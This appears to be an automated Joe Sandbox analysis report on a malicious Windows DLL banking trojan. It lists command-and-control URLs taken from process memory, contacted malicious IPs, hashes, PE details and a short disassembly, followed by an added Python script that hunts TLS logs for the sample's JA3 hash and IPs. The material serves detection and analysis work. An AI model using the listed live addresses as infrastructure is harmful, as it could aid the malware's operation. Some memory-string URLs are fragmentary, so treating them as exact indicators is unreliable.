                        https://192.46.210.220/coro8loaddll32.exe, 00000000.00000003.618838198.00000000015B8000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/6/loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/llgrundll32.exe, 00000003.00000003.562908687.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/llhrundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/56.219.47:8116/rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://182.46.210.220/loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.823680145.000000000073D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://142.46.210.220/rundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/softloaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.789649850.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.857089400.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96/Arundll32.exe, 00000003.00000003.490150806.0000000000713000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/derloaddll32.exe, 00000000.00000003.508139529.00000000015B9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/xrundll32.exe, 00000003.00000002.874153392.0000000000739000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/.140.214:808/loaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/l9rundll32.exe, 00000003.00000003.781390646.000000000073D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/zrundll32.exe, 00000003.00000003.675255963.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://183.244.140.214:808/loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/qrundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/aenh.dllurundll32.exe, 00000003.00000003.823680145.000000000073D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/l0rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/l/rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/hrundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/aenh.dllusZrundll32.exe, 00000003.00000003.599520556.0000000000739000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/lloaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown

                        Contacted IPs


                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.77.0.96 | unknown | United States | 20473 | AS-CHOOPAUS | true
185.56.219.47 | unknown | Italy | 202675 | KELIWEBIT | true
192.46.210.220 | unknown | United States | 5501 | FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe | true
143.244.140.214 | unknown | United States | 174 | COGENT-174US | true

                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510689
Start date: 28.10.2021
Start time: 04:55:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 46s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Variant.Razy.980776.8232.19927 (renamed file extension from 19927 to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.bank.troj.evad.winDLL@11/0@0/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 13.7% (good quality ratio 13.7%)
• Quality average: 78.8%
• Quality standard deviation: 15.9%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 173.222.108.210, 173.222.108.226, 20.50.102.62, 23.211.4.86, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.54.110.249, 23.203.70.208, 40.112.88.60, 51.11.168.232, 20.190.160.4, 20.190.160.134, 20.190.160.8, 20.190.160.136, 20.190.160.132, 20.190.160.69, 20.190.160.73, 20.190.160.71, 20.49.150.241, 51.104.136.2
                        • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
04:57:58 | API Interceptor | 180x Sleep call for process: rundll32.exe modified
04:58:01 | API Interceptor | 181x Sleep call for process: loaddll32.exe modified

                        Joe Sandbox View / Context

                        IPs

Match: 45.77.0.96
Associated Sample Name / URL | Detection
SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.28360.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.19796.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.9816.dll | malicious

Match: 185.56.219.47
Associated Sample Name / URL | Detection
SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.28360.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.19796.dll | malicious
SecuriteInfo.com.Variant.Razy.980776.9816.dll | malicious

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

Match: KELIWEBIT
Associated Sample Name / URL | Detection | Context
SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 185.56.219.47
SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious |
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        AS-CHOOPAUSSecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96

JA3 Fingerprints

Match                             Associated Sample Name / URL                      Detection  Context
51c64c77e60f3980eea90869b68c58a8  SecuriteInfo.com.Variant.Razy.980776.30568.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.9478.dll     malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.28061.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.25006.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.28328.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.4470.dll     malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.14159.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.20807.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.27063.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.2260.dll     malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.12452.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.6851.dll     malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.2379.dll     malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.10617.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.24814.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.29553.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.15127.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.28360.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.19796.dll    malicious  192.46.210.220
                                  SecuriteInfo.com.Variant.Razy.980776.9816.dll     malicious  192.46.210.220
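The context tables above give an analyst two kinds of network indicator: the JA3 hash the report lists as the Match (51c64c77e60f3980eea90869b68c58a8) and the IPs in the Context column of the ASN and JA3 rows (185.56.219.47, 45.77.0.96, 192.46.210.220). The tables present those IPs as context of related samples, not as this sample's own C2, so the hunt below treats them as corroborating evidence. JA3 fingerprints the TLS ClientHello (version, cipher suites, extensions, curves, point formats), which identifies the client TLS stack rather than the malware itself, so a JA3 hit on its own is rated low and only a JA3 hit to one of the listed IPs is rated high. The script is an added example, not part of the Joe Sandbox report; the log lines are constructed, and it assumes a Zeek ssl.log extended with a ja3 column (as the ja3 Zeek package adds) in the column order given in the code.

```python
"""Hunt over Zeek-style ssl.log lines for the JA3 hash and context IPs from
the report tables. Added example; the log lines below are constructed."""

from collections import namedtuple

# Indicators copied from the tables above. Treated as hunting inputs only;
# the tables list the IPs as context of related samples, not as this
# sample's own C2.
DRIDEX_JA3 = "51c64c77e60f3980eea90869b68c58a8"
CONTEXT_IPS = frozenset({"185.56.219.47", "45.77.0.96", "192.46.210.220"})

# Assumed column order for a Zeek ssl.log with the ja3 package loaded:
# ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, ja3
COLUMNS = ("ts", "uid", "orig_h", "orig_p", "resp_h", "resp_p", "ja3")

# Constructed sample log. 203.0.113.0/24 is TEST-NET-3; the 0123... JA3 is a
# placeholder for an unrelated client fingerprint; "-" is Zeek's unset value.
SAMPLE_SSL_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tja3
1634567890.123\tC1\t10.0.0.5\t49812\t192.46.210.220\t443\t51c64c77e60f3980eea90869b68c58a8
1634567891.456\tC2\t10.0.0.5\t49813\t203.0.113.10\t443\t51c64c77e60f3980eea90869b68c58a8
1634567892.789\tC3\t10.0.0.7\t50001\t45.77.0.96\t4443\t0123456789abcdef0123456789abcdef
1634567893.000\tC4\t10.0.0.9\t50002\t203.0.113.20\t443\t-
"""

Hit = namedtuple("Hit", "uid resp_h resp_p severity reasons")


def parse_ssl_log(text):
    """Yield one dict per data line; skip Zeek '#' header/footer lines and
    lines whose field count does not match the assumed layout."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(COLUMNS):
            continue  # malformed line; a real pipeline would log this
        yield dict(zip(COLUMNS, parts))


def classify(record):
    """Return a Hit for a record that matches an indicator, else None.

    JA3 alone is weak (other software can share the same TLS stack), so it
    is 'low'; a context IP alone is 'medium'; JA3 plus context IP is 'high'.
    """
    reasons = []
    if record["ja3"] == DRIDEX_JA3:
        reasons.append("ja3")
    if record["resp_h"] in CONTEXT_IPS:
        reasons.append("ip")
    if not reasons:
        return None
    severity = {("ja3", "ip"): "high", ("ip",): "medium", ("ja3",): "low"}[tuple(reasons)]
    return Hit(record["uid"], record["resp_h"], int(record["resp_p"]), severity, tuple(reasons))


def hunt(text):
    """Return all hits in the log text, highest severity first."""
    order = {"high": 0, "medium": 1, "low": 2}
    hits = [h for h in map(classify, parse_ssl_log(text)) if h is not None]
    return sorted(hits, key=lambda h: order[h.severity])


if __name__ == "__main__":
    for h in hunt(SAMPLE_SSL_LOG):
        print(f"{h.severity:6} uid={h.uid} dst={h.resp_h}:{h.resp_p} reasons={','.join(h.reasons)}")
```

Run against the constructed log, C1 (JA3 match to 192.46.210.220) comes out high, C3 (context IP on a non-standard port, no JA3 match) medium, C2 (JA3 match to an unrelated host) low, and C4 is not reported. Feeding a real ssl.log only requires adjusting COLUMNS to the file's #fields line.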

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.439735798494042
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SecuriteInfo.com.Variant.Razy.980776.8232.dll
File size:1375232
MD5:6df0687582c592e9860683a68858e082
SHA1:53780def0699c055381746ce4ecebef8f17fd12d
SHA256:90877ec621cc53fc31e693362e3b335a429aecc77abdbfd8b7d5d7493478f36d
SHA512:43c27e2af87306bd6389af980e50dffc2b219868881db1a026d56eef7b012f94d11426cf82338901c7e950b463e1e7a8e8f0f7563040a3b5c013b4a39906a376
SSDEEP:24576:anxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7i:acfk82uAJTI7EPswKwuG
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:...~...~...~.....8.z...w.X._...,...z...,...l...,...c...,...[.....<.f...~.......,.......,.......,.3.....,.......Rich~..........

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x4336b0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5BBD73BC [Wed Oct 10 03:36:28 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F0A74999C37h
call 00007F0A7499A967h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007F0A74999A26h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
push edx
mov edx, dword ptr [ebp+08h]
xor edx, dword ptr [0054806Ch]
push edx
call 00007F0A74999C74h
add esp, 08h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
mov eax, 00000020h
sub eax, edx
push eax
mov ecx, dword ptr [ebp+08h]
push ecx
call 00007F0A74999C43h
add esp, 08h
xor eax, dword ptr [0054806Ch]
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+0Ch]
ror eax, cl
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
call 00007F0A7499AFCDh
push eax
call 00007F0A749DBCD7h
add esp, 04h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword ptr [ebp+00h]

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x147190 | 0x6c | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1471fc | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x15c000 | 0x72b4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x143110 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x143168 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xc7000 | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xc5e2f | 0xc6000 | False | 0.442065922901 | data | 6.47813133498 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xc7000 | 0x80aec | 0x80c00 | False | 0.534103837985 | data | 5.52051601648 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x148000 | 0x13ba0 | 0x1800 | False | 0.1875 | DOS executable (block device driverpyright) | 3.99635070896 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x15c000 | 0x72b4 | 0x7400 | False | 0.710264008621 | data | 6.69742088731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL | Import
KERNEL32.dll | GetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

Exports

Name | Ordinal | Address
Bluewing | 1 | 0x49eed0
Earth | 2 | 0x49efd0
Masterjust | 3 | 0x49eb20

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2021 04:57:57.951545954 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:57.951613903 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:57.951729059 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:57.977791071 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:57.977837086 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:58.507962942 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:58.508114100 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:58.848462105 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
